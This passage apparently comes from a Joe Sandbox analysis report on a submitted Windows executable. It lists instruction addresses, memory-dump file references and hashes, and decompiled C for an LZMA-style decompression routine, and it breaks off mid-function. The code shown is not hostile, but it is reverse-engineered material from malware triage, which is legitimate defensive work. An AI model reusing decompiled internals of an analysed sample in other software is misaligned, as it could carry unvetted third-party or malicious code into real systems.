                                                                                              0x004073f1
                                                                                              0x004073f5
                                                                                              0x004073f5
                                                                                              0x0040741a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040741c
                                                                                              0x00407420
                                                                                              0x004075cf
                                                                                              0x00000000
                                                                                              0x004075cf
                                                                                              0x0040742c
                                                                                              0x00407433
                                                                                              0x0040743b
                                                                                              0x0040743e
                                                                                              0x00407441
                                                                                              0x00407441
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d5f
                                                                                              0x00406d61
                                                                                              0x00406d64
                                                                                              0x00406dd5
                                                                                              0x00406dd8
                                                                                              0x00406ddb
                                                                                              0x00406de2
                                                                                              0x00406dec
                                                                                              0x00000000
                                                                                              0x00406dec
                                                                                              0x00406d66
                                                                                              0x00406d6a
                                                                                              0x00406d6d
                                                                                              0x00406d6f
                                                                                              0x00406d72
                                                                                              0x00406d75
                                                                                              0x00406d77
                                                                                              0x00406d7a
                                                                                              0x00406d7c
                                                                                              0x00406d81
                                                                                              0x00406d84
                                                                                              0x00406d87
                                                                                              0x00406d8b
                                                                                              0x00406d92
                                                                                              0x00406d95
                                                                                              0x00406d9c
                                                                                              0x00406da0
                                                                                              0x00406da8
                                                                                              0x00406da8
                                                                                              0x00406da8
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406dac
                                                                                              0x00406daf
                                                                                              0x00406dcd
                                                                                              0x00406dcf
                                                                                              0x00000000
                                                                                              0x00406db1
                                                                                              0x00406db1
                                                                                              0x00406db4
                                                                                              0x00406db7
                                                                                              0x00406dba
                                                                                              0x00406dbc
                                                                                              0x00406dbc
                                                                                              0x00406dbc
                                                                                              0x00406dbf
                                                                                              0x00406dc2
                                                                                              0x00406dc4
                                                                                              0x00406dc5
                                                                                              0x00406dc8
                                                                                              0x00000000
                                                                                              0x00406dc8
                                                                                              0x00000000
                                                                                              0x00406ffe
                                                                                              0x00407002
                                                                                              0x00407020
                                                                                              0x00407023
                                                                                              0x0040702a
                                                                                              0x0040702d
                                                                                              0x00407030
                                                                                              0x00407033
                                                                                              0x00407036
                                                                                              0x00407039
                                                                                              0x0040703b
                                                                                              0x00407042
                                                                                              0x00407043
                                                                                              0x00407045
                                                                                              0x00407048
                                                                                              0x0040704b
                                                                                              0x0040704e
                                                                                              0x0040704e
                                                                                              0x00407053
                                                                                              0x00000000
                                                                                              0x00407053
                                                                                              0x00407004
                                                                                              0x00407007
                                                                                              0x0040700a
                                                                                              0x00407014
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407068
                                                                                              0x0040706c
                                                                                              0x0040708f
                                                                                              0x00407092
                                                                                              0x00407095
                                                                                              0x0040709f
                                                                                              0x0040706e
                                                                                              0x0040706e
                                                                                              0x00407071
                                                                                              0x00407074
                                                                                              0x00407077
                                                                                              0x00407084
                                                                                              0x00407087
                                                                                              0x00407087
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070ab
                                                                                              0x004070af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070b5
                                                                                              0x004070b9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070bf
                                                                                              0x004070c1
                                                                                              0x004070c5
                                                                                              0x004070c5
                                                                                              0x004070c8
                                                                                              0x004070cc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040711c
                                                                                              0x00407120
                                                                                              0x00407127
                                                                                              0x0040712a
                                                                                              0x0040712d
                                                                                              0x00407137
                                                                                              0x00000000
                                                                                              0x00407137
                                                                                              0x00407122
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407143
                                                                                              0x00407147
                                                                                              0x0040714e
                                                                                              0x00407151
                                                                                              0x00407154
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407157
                                                                                              0x0040715a
                                                                                              0x0040715d
                                                                                              0x0040715d
                                                                                              0x00407160
                                                                                              0x00407163
                                                                                              0x00407166
                                                                                              0x00407166
                                                                                              0x00407169
                                                                                              0x00407170
                                                                                              0x00407175
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407203
                                                                                              0x00407203
                                                                                              0x00407207
                                                                                              0x004075a5
                                                                                              0x00000000
                                                                                              0x004075a5
                                                                                              0x0040720d
                                                                                              0x00407210
                                                                                              0x00407213
                                                                                              0x00407217
                                                                                              0x0040721a
                                                                                              0x00407220
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407225
                                                                                              0x00407228
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406df8
                                                                                              0x00406df8
                                                                                              0x00406dfc
                                                                                              0x00407569
                                                                                              0x00000000
                                                                                              0x00407569
                                                                                              0x00406e02
                                                                                              0x00406e05
                                                                                              0x00406e08
                                                                                              0x00406e0c
                                                                                              0x00406e0f
                                                                                              0x00406e15
                                                                                              0x00406e17
                                                                                              0x00406e17
                                                                                              0x00406e17
                                                                                              0x00406e1a
                                                                                              0x00406e1d
                                                                                              0x00406e1d
                                                                                              0x00406e20
                                                                                              0x00406e23
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406e29
                                                                                              0x00406e2f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406e35
                                                                                              0x00406e35
                                                                                              0x00406e39
                                                                                              0x00406e3c
                                                                                              0x00406e3f
                                                                                              0x00406e42
                                                                                              0x00406e45
                                                                                              0x00406e46
                                                                                              0x00406e49
                                                                                              0x00406e4b
                                                                                              0x00406e51
                                                                                              0x00406e54
                                                                                              0x00406e57
                                                                                              0x00406e5a
                                                                                              0x00406e5d
                                                                                              0x00406e60
                                                                                              0x00406e63
                                                                                              0x00406e7f
                                                                                              0x00406e82
                                                                                              0x00406e85
                                                                                              0x00406e88
                                                                                              0x00406e8f
                                                                                              0x00406e93
                                                                                              0x00406e95
                                                                                              0x00406e99
                                                                                              0x00406e65
                                                                                              0x00406e65
                                                                                              0x00406e69
                                                                                              0x00406e71
                                                                                              0x00406e76
                                                                                              0x00406e78
                                                                                              0x00406e7a
                                                                                              0x00406e7a
                                                                                              0x00406e9c
                                                                                              0x00406ea3
                                                                                              0x00406ea6
                                                                                              0x00000000
                                                                                              0x00406eac
                                                                                              0x00000000
                                                                                              0x00406eac
                                                                                              0x00000000
                                                                                              0x00406eb1
                                                                                              0x00406eb1
                                                                                              0x00406eb5
                                                                                              0x00407575
                                                                                              0x00000000
                                                                                              0x00407575
                                                                                              0x00406ebb
                                                                                              0x00406ebe
                                                                                              0x00406ec1
                                                                                              0x00406ec5
                                                                                              0x00406ec8
                                                                                              0x00406ece
                                                                                              0x00406ed0
                                                                                              0x00406ed0
                                                                                              0x00406ed0
                                                                                              0x00406ed3
                                                                                              0x00406ed6
                                                                                              0x00406ed6
                                                                                              0x00406ed6
                                                                                              0x00406edc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406ede
                                                                                              0x00406ee1
                                                                                              0x00406ee4
                                                                                              0x00406ee7
                                                                                              0x00406eea
                                                                                              0x00406eed
                                                                                              0x00406ef0
                                                                                              0x00406ef3
                                                                                              0x00406ef6
                                                                                              0x00406ef9
                                                                                              0x00406efc
                                                                                              0x00406f14
                                                                                              0x00406f17
                                                                                              0x00406f1a
                                                                                              0x00406f1d
                                                                                              0x00406f1d
                                                                                              0x00406f20
                                                                                              0x00406f24
                                                                                              0x00406f26
                                                                                              0x00406efe
                                                                                              0x00406efe
                                                                                              0x00406f06
                                                                                              0x00406f0b
                                                                                              0x00406f0d
                                                                                              0x00406f0f
                                                                                              0x00406f0f
                                                                                              0x00406f29
                                                                                              0x00406f30
                                                                                              0x00406f33
                                                                                              0x00000000
                                                                                              0x00406f35
                                                                                              0x00000000
                                                                                              0x00406f35
                                                                                              0x00406f33
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f75
                                                                                              0x00406f75
                                                                                              0x00406f79
                                                                                              0x00407581
                                                                                              0x00000000
                                                                                              0x00407581
                                                                                              0x00406f7f
                                                                                              0x00406f82
                                                                                              0x00406f85
                                                                                              0x00406f89
                                                                                              0x00406f8c
                                                                                              0x00406f92
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f97
                                                                                              0x00406f9a
                                                                                              0x00406f9a
                                                                                              0x00406fa0
                                                                                              0x00406f3e
                                                                                              0x00406f3e
                                                                                              0x00406f41
                                                                                              0x00000000
                                                                                              0x00406f41
                                                                                              0x00406fa2
                                                                                              0x00406fa2
                                                                                              0x00406fa5
                                                                                              0x00406fa8
                                                                                              0x00406fab
                                                                                              0x00406fae
                                                                                              0x00406fb1
                                                                                              0x00406fb4
                                                                                              0x00406fb7
                                                                                              0x00406fba
                                                                                              0x00406fbd
                                                                                              0x00406fc0
                                                                                              0x00406fd8
                                                                                              0x00406fdb
                                                                                              0x00406fde
                                                                                              0x00406fe1
                                                                                              0x00406fe1
                                                                                              0x00406fe4
                                                                                              0x00406fe8
                                                                                              0x00406fea
                                                                                              0x00406fc2
                                                                                              0x00406fc2
                                                                                              0x00406fca
                                                                                              0x00406fcf
                                                                                              0x00406fd1
                                                                                              0x00406fd3
                                                                                              0x00406fd3
                                                                                              0x00406fed
                                                                                              0x00406ff4
                                                                                              0x00406ff7
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00407286
                                                                                              0x00407286
                                                                                              0x0040728a
                                                                                              0x004075b1
                                                                                              0x00000000
                                                                                              0x004075b1
                                                                                              0x00407290
                                                                                              0x00407293
                                                                                              0x00407296
                                                                                              0x0040729a
                                                                                              0x0040729d
                                                                                              0x004072a3
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407056
                                                                                              0x00407056
                                                                                              0x00407059
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407452
                                                                                              0x00407456
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x0040747b
                                                                                              0x00407482
                                                                                              0x00000000
                                                                                              0x00407482
                                                                                              0x00407458
                                                                                              0x0040745b
                                                                                              0x0040745e
                                                                                              0x00407461
                                                                                              0x00407468
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407543
                                                                                              0x00407546
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040717d
                                                                                              0x0040717f
                                                                                              0x00407186
                                                                                              0x00407187
                                                                                              0x00407189
                                                                                              0x0040718c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407194
                                                                                              0x00407197
                                                                                              0x0040719a
                                                                                              0x0040719c
                                                                                              0x0040719e
                                                                                              0x0040719e
                                                                                              0x0040719f
                                                                                              0x004071a2
                                                                                              0x004071a9
                                                                                              0x004071ac
                                                                                              0x004071ba
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040749f
                                                                                              0x0040749f
                                                                                              0x004074a3
                                                                                              0x004075db
                                                                                              0x00000000
                                                                                              0x004075db
                                                                                              0x004074a9
                                                                                              0x004074ac
                                                                                              0x004074af
                                                                                              0x004074b3
                                                                                              0x004074b6
                                                                                              0x004074bc
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074c1
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004071c2
                                                                                              0x004071c5
                                                                                              0x004071fb
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732e
                                                                                              0x0040732e
                                                                                              0x00407331
                                                                                              0x00407333
                                                                                              0x004075bd
                                                                                              0x00000000
                                                                                              0x004075bd
                                                                                              0x00407339
                                                                                              0x0040733c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407342
                                                                                              0x00407346
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00000000
                                                                                              0x00407349
                                                                                              0x004071c7
                                                                                              0x004071c9
                                                                                              0x004071cb
                                                                                              0x004071cd
                                                                                              0x004071d0
                                                                                              0x004071d1
                                                                                              0x004071d3
                                                                                              0x004071d5
                                                                                              0x004071d8
                                                                                              0x004071db
                                                                                              0x004071f1
                                                                                              0x004071f6
                                                                                              0x0040722e
                                                                                              0x0040722e
                                                                                              0x00407232
                                                                                              0x0040725e
                                                                                              0x00407260
                                                                                              0x00407267
                                                                                              0x0040726a
                                                                                              0x0040726d
                                                                                              0x0040726d
                                                                                              0x00407272
                                                                                              0x00407272
                                                                                              0x00407274
                                                                                              0x00407277
                                                                                              0x0040727e
                                                                                              0x00407281
                                                                                              0x004072ae
                                                                                              0x004072ae
                                                                                              0x004072b1
                                                                                              0x004072b4
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00000000
                                                                                              0x00407328
                                                                                              0x004072b6
                                                                                              0x004072bc
                                                                                              0x004072bf
                                                                                              0x004072c2
                                                                                              0x004072c5
                                                                                              0x004072c8
                                                                                              0x004072cb
                                                                                              0x004072ce
                                                                                              0x004072d1
                                                                                              0x004072d4
                                                                                              0x004072d7
                                                                                              0x004072f0
                                                                                              0x004072f2
                                                                                              0x004072f5
                                                                                              0x004072f6
                                                                                              0x004072f9
                                                                                              0x004072fb
                                                                                              0x004072fe
                                                                                              0x00407300
                                                                                              0x00407302
                                                                                              0x00407305
                                                                                              0x00407307
                                                                                              0x0040730a
                                                                                              0x0040730e
                                                                                              0x00407310
                                                                                              0x00407310
                                                                                              0x00407311
                                                                                              0x00407314
                                                                                              0x00407317
                                                                                              0x004072d9
                                                                                              0x004072d9
                                                                                              0x004072e1
                                                                                              0x004072e6
                                                                                              0x004072e8
                                                                                              0x004072eb
                                                                                              0x004072eb
                                                                                              0x0040731a
                                                                                              0x00407321
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00407321
                                                                                              0x00407234
                                                                                              0x00407237
                                                                                              0x00407239
                                                                                              0x0040723c
                                                                                              0x0040723f
                                                                                              0x00407242
                                                                                              0x00407244
                                                                                              0x00407247
                                                                                              0x0040724a
                                                                                              0x0040724a
                                                                                              0x0040724d
                                                                                              0x0040724d
                                                                                              0x00407250
                                                                                              0x00407257
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00407257
                                                                                              0x004071dd
                                                                                              0x004071e0
                                                                                              0x004071e2
                                                                                              0x004071e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f44
                                                                                              0x00406f44
                                                                                              0x00406f48
                                                                                              0x0040758d
                                                                                              0x00000000
                                                                                              0x0040758d
                                                                                              0x00406f4e
                                                                                              0x00406f51
                                                                                              0x00406f54
                                                                                              0x00406f57
                                                                                              0x00406f5a
                                                                                              0x00406f5d
                                                                                              0x00406f60
                                                                                              0x00406f62
                                                                                              0x00406f65
                                                                                              0x00406f68
                                                                                              0x00406f6b
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070cf
                                                                                              0x004070cf
                                                                                              0x004070d3
                                                                                              0x00407599
                                                                                              0x00000000
                                                                                              0x00407599
                                                                                              0x004070d9
                                                                                              0x004070dc
                                                                                              0x004070df
                                                                                              0x004070e2
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e7
                                                                                              0x004070ea
                                                                                              0x004070ed
                                                                                              0x004070f0
                                                                                              0x004070f3
                                                                                              0x004070f6
                                                                                              0x004070f7
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070fc
                                                                                              0x004070ff
                                                                                              0x00407102
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407108
                                                                                              0x0040710a
                                                                                              0x0040710a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x00407350
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407356
                                                                                              0x00407359
                                                                                              0x0040735c
                                                                                              0x0040735f
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407364
                                                                                              0x00407367
                                                                                              0x0040736a
                                                                                              0x0040736d
                                                                                              0x00407370
                                                                                              0x00407373
                                                                                              0x00407374
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407379
                                                                                              0x0040737c
                                                                                              0x0040737f
                                                                                              0x00407382
                                                                                              0x00407385
                                                                                              0x00407389
                                                                                              0x0040738b
                                                                                              0x0040738e
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x00000000
                                                                                              0x0040710d
                                                                                              0x0040738e
                                                                                              0x004075c3
                                                                                              0x004075e5
                                                                                              0x004075eb
                                                                                              0x004075ed
                                                                                              0x004075f4
                                                                                              0x004075f6
                                                                                              0x004075fd
                                                                                              0x00407601
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x004075fa
                                                                                              0x004075fa
                                                                                              0x00000000
                                                                                              0x004075fa
                                                                                              0x00407447
                                                                                              0x004074cd
                                                                                              0x004074d3
                                                                                              0x004074d6
                                                                                              0x004074d9
                                                                                              0x004074dc
                                                                                              0x004074df
                                                                                              0x004074e2
                                                                                              0x004074e5
                                                                                              0x004074e8
                                                                                              0x004074ee
                                                                                              0x00407507
                                                                                              0x0040750a
                                                                                              0x0040750d
                                                                                              0x00407510
                                                                                              0x00407514
                                                                                              0x00407516
                                                                                              0x00407517
                                                                                              0x0040751a
                                                                                              0x004074f0
                                                                                              0x004074f0
                                                                                              0x004074f8
                                                                                              0x004074fd
                                                                                              0x004074ff
                                                                                              0x00407502
                                                                                              0x00407502
                                                                                              0x00407524
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00407524
                                                                                              0x00000000
                                                                                              0x00407399

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                              • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                                                              • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                              • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 98%
                                                                                              			E004070AB() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
